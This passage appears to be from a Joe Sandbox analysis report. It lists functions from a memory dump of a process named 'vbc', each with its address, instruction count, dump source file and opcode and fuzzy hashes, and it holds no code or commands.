                                                                                                                        • Instruction ID: 902e0217dfa1fa68e5c7eeef7499afdf84c7e4378ba991aefb6e88bc1886cbba
                                                                                                                        • Opcode Fuzzy Hash: 6fcf909129064614c11a96283c40a72df333bd5f8b58e7d9ffdeda357f98cab8
                                                                                                                        • Instruction Fuzzy Hash: 7D51DD7160420ECBDB25DE24C568B35B7AAFB81255F14E52DE887CB158DA71CC83C761
                                                                                                                        Function 0536A430 Relevance: .1, Instructions: 139COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0184a2abf88b90330d8ef66fd383c7e38d0202d4244e911cdb03e760e9b0eab9
                                                                                                                        • Instruction ID: 0963074824601e73450054f04a218124fcec1f04e0068a8df01336fa22f1dbb7
                                                                                                                        • Opcode Fuzzy Hash: 0184a2abf88b90330d8ef66fd383c7e38d0202d4244e911cdb03e760e9b0eab9
                                                                                                                        • Instruction Fuzzy Hash: 78412A32B50210DBCB2DEF649886FBA7B66FB45304F41542DFE42AB250DBB1D890CB61
                                                                                                                        Function 053601F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eb2a2fa16a878adb6ac617dda949da067b3ce0cea451a201ce2e761aaa2bcae8
                                                                                                                        • Instruction ID: a5d7b25005ca3b92303bf313bf89de1adbffeed28b284dfae1061df972949ee1
                                                                                                                        • Opcode Fuzzy Hash: eb2a2fa16a878adb6ac617dda949da067b3ce0cea451a201ce2e761aaa2bcae8
                                                                                                                        • Instruction Fuzzy Hash: 7241CE36A00218DBCB18DFA8C449AEEB7B5FF48710F24816EE816F7244D775AC41CBA4
                                                                                                                        Function 05372750 Relevance: .1, Instructions: 137COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                        • Instruction ID: 40bca871c0a858b3074844615ce5f294881fd3749a9f44566b88d8ad11b28cd3
                                                                                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                        • Instruction Fuzzy Hash: 02514C76A00615DFCB14CF98C580AAEF7B6FF84710F2481A9D815A7790D774AE41CB90
                                                                                                                        Function 05336154 Relevance: .1, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e45383af500744a6c964c94e2ac6dfd2e8b5b56f481af3bc7d727a39f90e8527
                                                                                                                        • Instruction ID: 746cf04060d3f29e4f29084f845e65831015079605513241f5f9287264d2c19b
                                                                                                                        • Opcode Fuzzy Hash: e45383af500744a6c964c94e2ac6dfd2e8b5b56f481af3bc7d727a39f90e8527
                                                                                                                        • Instruction Fuzzy Hash: 1D51F570A04516AFDB29DB24CC0ABF9BBB6FF01314F1582A5E425A76D0DB749981CF80
                                                                                                                        Function 05330D59 Relevance: .1, Instructions: 130COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cc16d25eda6ad60c9abd661c12b162b9a99d779108e4a0668dc03aebb55d3d65
                                                                                                                        • Instruction ID: 3895195731dc960ef1d3f1d8db6b1255a7bf61856bb0227216a0d53f883919ec
                                                                                                                        • Opcode Fuzzy Hash: cc16d25eda6ad60c9abd661c12b162b9a99d779108e4a0668dc03aebb55d3d65
                                                                                                                        • Instruction Fuzzy Hash: 0A41B375B007189FEB39DF64CC8AFAAB7AABB45610F00049AE8459B281D7B4ED44CB51
                                                                                                                        Function 053F866E Relevance: .1, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                        • Instruction ID: 40d7c2978f251b500d54151a77067c66fa79afd673a4d3f1052558c209a27ae1
                                                                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                        • Instruction Fuzzy Hash: A841B276B04205ABDB19DF99CC85ABFFBBABF88600F144069EA01E7351DA70DD0587A0
                                                                                                                        Function 0535A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 81f8cb7f1deeeb978a82bac5008e3cf846ec3eb4f9036a1a1184664f0db38bf3
                                                                                                                        • Instruction ID: 1507ace70c6dc26747f1e046c6696d4ca6e176d2347bacb9a9ea7ba29d7bfdf5
                                                                                                                        • Opcode Fuzzy Hash: 81f8cb7f1deeeb978a82bac5008e3cf846ec3eb4f9036a1a1184664f0db38bf3
                                                                                                                        • Instruction Fuzzy Hash: 5C412272A08214CFCF29DF68C490FEE7BB5FB48321F551655E812AB280CB749900DFA0
                                                                                                                        Function 0532A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                        • Instruction ID: 54ddbd56737cd8d0b2832b4acdfe66b3f4f9c0c83506199f148e4a831ee7ddda
                                                                                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                        • Instruction Fuzzy Hash: 44414A31B08722DBCB28EE658464BBAF773FB40754F15C06AE8458B240D6F19D80CBA1
                                                                                                                        Function 05360710 Relevance: .1, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                        • Instruction ID: ed234f567203ea0d32c8f7a72c48102f101737011a7eedf79a5f54d218832400
                                                                                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                        • Instruction Fuzzy Hash: 4D418D75A00705EFCB29CFA8C985AAAB7F9FF08700B10896DE156D7654D730EA44CFA1
                                                                                                                        Function 0533262C Relevance: .1, Instructions: 119COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cc374988796c8e00d149860e4c3f6e55527a3dee618f0b33db76bbdfc78d2acb
                                                                                                                        • Instruction ID: 079986cadfb2033b6d9f13b653f3bbb5238758d0b2b6acd4ad08bbbb3899aee7
                                                                                                                        • Opcode Fuzzy Hash: cc374988796c8e00d149860e4c3f6e55527a3dee618f0b33db76bbdfc78d2acb
                                                                                                                        • Instruction Fuzzy Hash: A941E175601714CFCB25EF28C946B6ABBF6FF44310F2182AAE416DB6A1DB70A941CF41
                                                                                                                        Function 053B07C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9d2a54f8625a8fb4274d016e961a8597725f4855be79071c6eca83e29034c1e7
                                                                                                                        • Instruction ID: be4afd2d6bb5f3c2d1b73744c4bc879eab2fcdea9df4d298f07855675b8ed8f7
                                                                                                                        • Opcode Fuzzy Hash: 9d2a54f8625a8fb4274d016e961a8597725f4855be79071c6eca83e29034c1e7
                                                                                                                        • Instruction Fuzzy Hash: 4F419171A143149FD724DF25C849F9BBBE8FF88610F004A2EF998C7250DB709904CB92
                                                                                                                        Function 05402E4F Relevance: .1, Instructions: 112COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 81a04aa6e8f716182105713d3f190816b803b6ed99c1f7ed8e7a94d59025a880
                                                                                                                        • Instruction ID: 08d384a6575d384c191d195dede013f874265b469ef3f984ade22907cc4a6e2e
                                                                                                                        • Opcode Fuzzy Hash: 81a04aa6e8f716182105713d3f190816b803b6ed99c1f7ed8e7a94d59025a880
                                                                                                                        • Instruction Fuzzy Hash: 5D416276A00109EFCB15CF98C884EEEB7B5FF84754F24406AE905AB385D771EA41CB90
                                                                                                                        Function 053B05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 865259cfc7d69a9c2fe4ddd35d351547a2635adb72fb79dc836b4b0ffa0ee7f3
                                                                                                                        • Instruction ID: 990722ed7922c45c750ee380be28b6055e4b3f34190c1d5838bb19b37b2c3a3e
                                                                                                                        • Opcode Fuzzy Hash: 865259cfc7d69a9c2fe4ddd35d351547a2635adb72fb79dc836b4b0ffa0ee7f3
                                                                                                                        • Instruction Fuzzy Hash: 2C41D3726087459FD324DF69C884BABB7E5FFC8700F040A19F95597A80E7B0E904C7A6
                                                                                                                        Function 053280A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8585591bc18466af6487c6d379242f601ce373242c4ccc67ca68fe8dc574e565
                                                                                                                        • Instruction ID: e0ba7e2a6b99853af43bacd9f46cb9297445a62edaec844053b09a1679e48988
                                                                                                                        • Opcode Fuzzy Hash: 8585591bc18466af6487c6d379242f601ce373242c4ccc67ca68fe8dc574e565
                                                                                                                        • Instruction Fuzzy Hash: 8841CE71A05B25AFDB00DF5AC880AA9F7B6FF44760F248229D816A76C0DB74FD418BD0
                                                                                                                        Function 05328CD0 Relevance: .1, Instructions: 107COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b949e1a12b28aea522669203f8d1a848c2d398717adcdbd1d8f89adce60b74cb
                                                                                                                        • Instruction ID: 72447df38fd7f877b73a908a12c767a7f73f90da8a4d801f04b32f0b797b7816
                                                                                                                        • Opcode Fuzzy Hash: b949e1a12b28aea522669203f8d1a848c2d398717adcdbd1d8f89adce60b74cb
                                                                                                                        • Instruction Fuzzy Hash: D531C472A04724DFCB21DF18C840AAEF7F6FF54724F24896AD456A7690CB71AD05CB80
                                                                                                                        Function 053402E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                        • Instruction ID: 46a0c05e2eef0ee766d86d9024aef98b944c4d8b38d19dfe9e5714d650d7f273
                                                                                                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                        • Instruction Fuzzy Hash: DB31E771B04244AFDB25DBA8CC48BAEBFE9BF04750F048565E855DB351C6B4A984CFA0
                                                                                                                        Function 053DE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dd2faf142078ecc1a2b5b94d2fe47dae0f2fb3ad27ff669eda07b8c6fef5a191
                                                                                                                        • Instruction ID: a417785c68a35f5b0cfd89a5662335b64f4180189d3884a662a8600d52fe5f81
                                                                                                                        • Opcode Fuzzy Hash: dd2faf142078ecc1a2b5b94d2fe47dae0f2fb3ad27ff669eda07b8c6fef5a191
                                                                                                                        • Instruction Fuzzy Hash: 5E318835750715ABD722AF659C45FBBBBBDEB48B50F100028FA04AF291DAB4DC00D7A0
                                                                                                                        Function 05334260 Relevance: .1, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eb0f4f355bd579850daf5442b034753232c9409147817f2341601ead5c980723
                                                                                                                        • Instruction ID: 278e856acacc15c08261afe6fdad023cc2a12a0e8f48fd3c09da3f487603a08f
                                                                                                                        • Opcode Fuzzy Hash: eb0f4f355bd579850daf5442b034753232c9409147817f2341601ead5c980723
                                                                                                                        • Instruction Fuzzy Hash: 6A41BF71204B45DFCB2ACF68C889FD6BBE9BF45314F118429E99A8B650CB74F844CB90
                                                                                                                        Function 053D0DF0 Relevance: .1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                                                        • Instruction ID: 41c102b04a95c1fc5e3329314389d5f6e49fbe9fd2a8f2d0633390f3c26a362e
                                                                                                                        • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                                                        • Instruction Fuzzy Hash: E531B272609745AFD72ADA14D849E6BF7FCEB80A60F04492DF85197250F670EC04CBB1
                                                                                                                        Function 053F61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b2d57364674dd822a3a0bdcef14789607fdb6de705bd638364979eb8f2d11c69
                                                                                                                        • Instruction ID: 2b4d57f76cfc214f999342af72a744264d28d8fb257a6ba103d91e9ffb9e5dd3
                                                                                                                        • Opcode Fuzzy Hash: b2d57364674dd822a3a0bdcef14789607fdb6de705bd638364979eb8f2d11c69
                                                                                                                        • Instruction Fuzzy Hash: 1131D276A00219FBDB15DF98CC85FAEB7B5FB44740F454169E900AB244D7B0AD40CB90
                                                                                                                        Function 053307AF Relevance: .1, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 58761f052b01b9e4223646786eefe19e0a0f20461b00e00626b594c02fa47f06
                                                                                                                        • Instruction ID: e8873efaddef427609a1475cf8e0e023593299d02bc206b3b1372bc28299bfa2
                                                                                                                        • Opcode Fuzzy Hash: 58761f052b01b9e4223646786eefe19e0a0f20461b00e00626b594c02fa47f06
                                                                                                                        • Instruction Fuzzy Hash: 9031C532A04725DBC71BEE648889E7BBBAABFC4660F014529FC559B310DA30DC0197D1
                                                                                                                        Function 053F60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ff674a7106488488b9166248ed30e3e99f922c58ad228100928dd3fb16f544b4
                                                                                                                        • Instruction ID: 8b7196750062fd597e4fa2728bac2c3ddbc61d19a9865bfbefe5a3332c5490ca
                                                                                                                        • Opcode Fuzzy Hash: ff674a7106488488b9166248ed30e3e99f922c58ad228100928dd3fb16f544b4
                                                                                                                        • Instruction Fuzzy Hash: 80319171B00615ABDB229FA9CC51AAABBBAEB44754F104069F605DB341DA70ED008B90
                                                                                                                        Function 05338550 Relevance: .1, Instructions: 94COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd6e8fb4f0cfe1f1f9f3a498936dd8b41cfb5599c177fc9c5172e0d253409c03
                                                                                                                        • Instruction ID: 4768c7fda9303229316148449f44ead0eef822f091e96114d2411fd64ed3aaa8
                                                                                                                        • Opcode Fuzzy Hash: bd6e8fb4f0cfe1f1f9f3a498936dd8b41cfb5599c177fc9c5172e0d253409c03
                                                                                                                        • Instruction Fuzzy Hash: E23198B26097019FE725CF19C841B2BF7E5BB88700F04496DF88A9B390D3B4E804CB91
                                                                                                                        Function 0535AF69 Relevance: .1, Instructions: 93COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 01da1c4149f63ff79d31563458b510f012b690f9c365a7ca74cc6c6105f01dce
                                                                                                                        • Instruction ID: 794515ebe56fbd2b371bdd54e8a4a2bc7cf4ef5d432307af5bc9c1e6155adcef
                                                                                                                        • Opcode Fuzzy Hash: 01da1c4149f63ff79d31563458b510f012b690f9c365a7ca74cc6c6105f01dce
                                                                                                                        • Instruction Fuzzy Hash: 68315075A011699BDB24DF19CC58FAFB7B9FB44650F0500AAEC09E7250DB349E81CFA1
                                                                                                                        Function 0536A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                        • Instruction ID: d7e77bd35587afec290576de686fd908222e04e323ba6b7af3efa31e7abb2761
                                                                                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                        • Instruction Fuzzy Hash: 45314972B04B00EFD761CFA9DE41B57B7FDBB08A50F08492DA59AD3650E670E800CB61
                                                                                                                        Function 0535438F Relevance: .1, Instructions: 89COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 39745bbf51442e02a4f46d8fac307de877dcdf83e7a8ab2628ac945fe88dbdbb
                                                                                                                        • Instruction ID: fa9a3bac18db89b32a85fcc96d9610b1c2952e365e62426b0a122b59d56a0f47
                                                                                                                        • Opcode Fuzzy Hash: 39745bbf51442e02a4f46d8fac307de877dcdf83e7a8ab2628ac945fe88dbdbb
                                                                                                                        • Instruction Fuzzy Hash: D431F671B042459FCB29EFA4C985E6FB7FABB80314F008429D846D3654EB30E981CB90
                                                                                                                        Function 0532E420 Relevance: .1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9a514368c0a3a5d9d87c8724d2e6e56a537c0e38972a16c09f54d183f87bfd8f
                                                                                                                        • Instruction ID: fc843beb01a5ed4bbacac4f16de4e1670e34a1d3e2e328450140d63ce339fce7
                                                                                                                        • Opcode Fuzzy Hash: 9a514368c0a3a5d9d87c8724d2e6e56a537c0e38972a16c09f54d183f87bfd8f
                                                                                                                        • Instruction Fuzzy Hash: 6A31A231A0193C9BDB31DB14CC42FFA77BEEB05740F1101A5E645A7290D6B4AE909F90
                                                                                                                        Function 0532C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d066caf9df7ddf0ff119ac416e5b96377d1df2c2dcf5a429cd98552ec1ce1f55
                                                                                                                        • Instruction ID: 6045fc685e4f7b57fc2aaf9886b933a572e12166e55af5f52db75adec9499de2
                                                                                                                        • Opcode Fuzzy Hash: d066caf9df7ddf0ff119ac416e5b96377d1df2c2dcf5a429cd98552ec1ce1f55
                                                                                                                        • Instruction Fuzzy Hash: 5E31E5756003109BCB38BF24C845BB977B5BF40314F9485A9FC4A9B381DE74A986CBA0
                                                                                                                        Function 053EC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
